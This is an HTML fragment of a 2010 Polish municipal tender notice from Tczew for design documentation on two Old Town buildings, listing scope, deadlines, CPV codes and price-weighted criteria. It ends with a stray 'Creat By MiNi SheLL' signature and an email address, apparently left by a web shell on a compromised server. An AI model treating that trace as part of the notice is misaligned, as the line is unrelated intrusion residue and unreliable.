<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tczewie, Biuro Zamówień Publicznych, p. 50. Opłata za wydanie SIWZ-15 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2010 godzina 09:00, miejsce: Biuro Obsługi Klienta Urzędu Miejskiego w Tczewie, Plac Piłsudskiego 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013; projekt pn. Rewitalizacja strefy A obszaru zdegradowanego Starego Miasta w Tczewie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiaru robót oraz kosztorysu inwestorskiego dla przebudowy budynku przy ul. Zamkowej 26 w Tczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej przebudowy budynku przy ul. Zamkowa 26 w Tczewie (działka nr 325 obr. nr 8) w celu adaptacji dotychczasowych pomieszczeń mieszkalnych na lokal użytkowy przeznaczony na pomieszczenia świetlicy socjoterapeutycznej.

Wielobranżowy projekt budowlany i wykonawczy należy wykonać na podstawie/zgodnie z:
- przepisami ustawy Prawo budowlane z dnia 07 lipca 1994 ( Dz.U. 2006 nr 156 poz. 1118 z późniejszymi zmianami) oraz przepisami ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 (t.j. Dz. U. z 2010r. Nr 113, poz.759),
- wypisu z Miejscowego Planu Zagospodarowania Przestrzennego,
- mapy do celów projektowych pozyskanych przez wykonawcę na jego koszt w zakresie niezbędnym do wykonania projektu budowlanego,
- warunków technicznych przyłączenia i dostawy mediów pozyskanych przez Wykonawcę,
- obowiązujących norm i przepisów,
- uzyskanych przez Wykonawcę (również na podstawie pełnomocnictw i upoważnień udzielonych przez zamawiającego) wymaganych opinii, uzgodnień, pozwoleń i sprawdzeń,
- uzyskanych przez Wykonawcę w zależności od potrzeb wyników badań geologiczno-inżynierskich oraz geotechnicznych warunków posadowienia obiektów budowlanych,
- zaleceń Miejskiego Konserwatora Zabytków odnośnie przebudowy budynku w ramach projektu Rewitalizacji obszaru zdegradowanego.

Planowana funkcja użytkowa budynku

Przewiduje się zagospodarowanie pomieszczeń budynku na lokal użytkowy przeznaczony na działalność świetlicy socjoterapeutycznej dla dzieci. W związku z tym należy złożyć wniosek o zmianę sposobu użytkowania obiektu budowlanego.     
W świetlicy należy  wydzielić  następujące pomieszczenia: pokoje, kuchnię i łazienkę.

Przedmiot  zamówienia polega na:

a) opracowaniu dokumentacji projektowej:
- projekt budowlany,
- projekt wykonawczy,
- przedmiar robót,
- informacja dotycząca bezpieczeństwa i ochrony zdrowia,
- opracowanie  orzeczenia techniczno- konstrukcyjnego niezbędne do prawidłowego wykonania dokumentacji projektowej,
- wykonanie inwentaryzacji stanu istniejącego,
b) opracowaniu specyfikacji technicznych wykonania i odbioru robót budowlanych,
c) opracowaniu kosztorysów inwestorskich z wyszczególnieniem procentowym udziałem realizacji elementów robót w stosunku do wartości ogółem przedmiotu zamówienia, co będzie niezbędne przy opracowaniu harmonogramu płatności dla wykonawcy zadania, 
d) opracowaniu zbiorczego zestawienia kosztów,
e) pełnieniu nadzoru autorskiego.

Wszystkie opracowania należy wykonać na nośniku elektronicznym w formacie pdf bez kosztorysu oraz na papierze w 9 egzemplarzach za wyjątkiem pozycji c i d, które należy wykonać na papierze w 2 egzemplarzach.

Przedmiot zamówienia obejmuje również przekazanie praw autorskich w  zakresie niniejszej dokumentacji projektowej, w tym praw autorskich zależnych.

Szczegółowy zakres opracowań wchodzących w skład dokumentacji projektowej:

- projekt budowlany i wykonawczy w branży ogólnobudowlanej i  konstrukcyjnej,
- projekt budowlany i wykonawczy w branży sanitarnej: instalacje wod.- kan., kanalizacja deszczowa, instalacja gazowa,  CO    z zainstalowanym kotłem na paliwo gazowe 
- projekt budowlany i wykonawczy w branży elektrycznej (teletechnicznej) komputerowe   telefonii oraz systemu sygnalizacji włamania i pożaru,  	
- projekt budowlany i wykonawczy instalacji elektrycznej - wewnętrzne linie zasilające, instalację gniazd wtykowych, instalację oświetleniową, ochronę przepięciową i ochronę od porażeń, rozdzielnicę główną.

Projekty winny posiadać wszystkie niezbędne uzgodnienia zapewniające uzyskanie pozwolenia  na budowę.
Sporządzić plan BIOZ.
Projektant wystąpi i uzyska decyzje środowiskowe.
Projektant wykona i przedstawi do uzgodnienia Zamawiającemu koncepcję projektowo architektoniczną adaptacji pomieszczeń budynku. Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013; projekt pn. Rewitalizacja strefy A obszaru zdegradowanego Starego Miasta w Tczewie.

Wykonawca niezwłocznie udzieli pisemnych wyjaśnień dotyczących wykonanej dokumentacji objętej przedmiotem umowy w trakcie przygotowywania i przeprowadzania procedury postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych na podstawie dokumentacji objętej przedmiotem umowy.

Wykonawca przekaże prawa autorskie w zakresie dokumentacji projektowej, o której mowa w ust. 1 oraz ust. 2  § 1 Umowy, w tym praw autorskich zależnych oraz będzie pełnił nadzór autorski podczas realizacji inwestycji na podstawie niniejszej dokumentacji projektowej, tj.: stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem, uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej - w terminie od dnia odebrania dokumentacji projektowej do dnia 31.12.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.40.00-0, 71.24.50.00-7, 71.24.60.00-4, 71.24.70.00-1, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu wykonania dokumentacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, przedmiaru robót oraz kosztorysu inwestorskiego dla przebudowy budynku przy ul. Mickiewicza 18 w Tczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej przebudowy budynku przy ul. Mickiewicza 18 w Tczewie (działka nr 148 obr. nr 8), której celem jest poprawienie obecnego stanu technicznego obiektu zachowując istniejącą w budynku funkcję mieszkalną i usługową.

Wielobranżowy projekt budowlany i wykonawczy należy wykonać na podstawie /zgodnie z:
- przepisami ustawy Prawo budowlane z dnia 07 lipca 1994 ( Dz.U. 2006 nr 156 poz.1118 z późniejszymi zmianami) oraz przepisami ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 (t.j. Dz. U. z 2010r. Nr 113, poz.759),
- wypisu z Miejscowego Planu Zagospodarowania Przestrzennego,
- mapy do celów projektowych pozyskanych przez wykonawcę na jego koszt zakresie niezbędnym do wykonania projektu budowlanego,
- warunków technicznych przyłączenia i dostawy mediów pozyskanych przez wykonawcę
- obowiązujących norm i przepisów,	
- uzyskanych przez wykonawcę (również na podstawie pełnomocnictw i upoważnień udzielonych przez zamawiającego) wymaganych opinii, uzgodnień, pozwoleń i sprawdzeń, 
- uzyskanych przez wykonawcę w zależności od potrzeb wyników badań geologiczno - inżynierskich oraz geotechnicznych warunków posadowienia obiektów budowlanych,
- zaleceń Miejskiego Konserwatora Zabytków odnośnie przebudowy budynku w ramach projektu Rewitalizacji obszaru zdegradowanego.

Planowana funkcja użytkowa budynku

Planowane jest pozostawienie istniejących aktualnie w obiekcie funkcji mieszkalnej i usługowej.

Przedmiot zamówienia polega na:
a) opracowaniu dokumentacji projektowej: 
- projekt budowlany,
- projekt wykonawczy,
- przedmiar robót,
- informacja dotycząca bezpieczeństwa i ochrony zdrowia,
- wykonanie orzeczenia  techniczno-konstrukcyjnego niezbędnego do prawidłowego wykonania dokumentacji projektowej,
- wykonanie inwentaryzacji stanu istniejącego,
b) opracowaniu specyfikacji technicznych wykonania i odbioru robót budowlanych,
c) opracowaniu kosztorysów inwestorskich z wyszczególnieniem procentowym udziałem realizacji elementów robót w stosunku do wartości ogółem przedmiotu zamówienia, co będzie niezbędne przy opracowaniu harmonogramu płatności dla wykonawcy zadania, 
d) opracowaniu zbiorczego zestawienia kosztów,
e) pełnieniu nadzoru autorskiego.

Wszystkie opracowania należy wykonać na nośniku elektronicznym w formacie pdf  bez kosztorysu oraz na papierze w 9 egzemplarzach za wyjątkiem pozycji c i d, które należy wykonać na papierze w 2 egzemplarzach.
Przedmiot zamówienia obejmuje również przekazanie praw autorskich w zakresie niniejszej dokumentacji projektowej, w tym praw autorskich zależnych.
Szczegółowy zakres opracowań wchodzących w skład dokumentacji projektowej:
- projekt budowlany i wykonawczy w branży ogólnobudowlanej i  konstrukcyjnej,
- projekt budowlany i wykonawczy w branży sanitarnej: instalacje wod.- kan., kanalizacja deszczowa, instalacja gazowa, CO  z zainstalowanym kotłem na paliwo olejowe  z możliwością zainstalowania alternatywnego kotła na paliwo gazowe,
- projekt budowlany i wykonawczy w branży elektrycznej (teletechnicznej) komputerowej i  telefonii oraz systemu sygnalizacji włamania i pożaru, 
- projekt budowlany i wykonawczy instalacji elektrycznej - wewnętrzne linie zasilające, instalację gniazd wtykowych, instalację oświetleniową, ochronę przepięciową i ochronę od porażeń, rozdzielnicę główną.

Projekty winny posiadać wszystkie niezbędne uzgodnienia zapewniające uzyskanie pozwolenia  na budowę.
Sporządzić plan BIOZ.
Projektant wystąpi i uzyska decyzje środowiskowe.
Projektant wykona i przedstawi do uzgodnienia Zamawiającemu koncepcję projektowo -architektoniczną remontu pomieszczeń budynków.

Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013; projekt pn. Rewitalizacja strefy A obszaru zdegradowanego Starego Miasta w Tczewie.

Wykonawca niezwłocznie udzieli pisemnych wyjaśnień dotyczących wykonanej dokumentacji objętej przedmiotem umowy w trakcie przygotowywania i przeprowadzania procedury postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych na podstawie dokumentacji objętej przedmiotem umowy.

Wykonawca przekaże prawa autorskie w zakresie dokumentacji projektowej, o której mowa w ust. 1 oraz ust. 2  § 1 Umowy, w tym praw autorskich zależnych oraz będzie pełnił nadzór autorski podczas realizacji inwestycji na podstawie niniejszej dokumentacji projektowej, tj.: stwierdzania w toku wykonywania robót budowlanych zgodności realizacji z projektem, uzgadniania możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej - w terminie od dnia odebrania dokumentacji projektowej do dnia 31.12.2014r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.24.20.00-6, 71.24.40.00-0, 71.24.50.00-7, 71.24.60.00-4, 71.24.70.00-1, 71.24.80.00-8, 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Skrócenie terminu wykonania dokumentacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com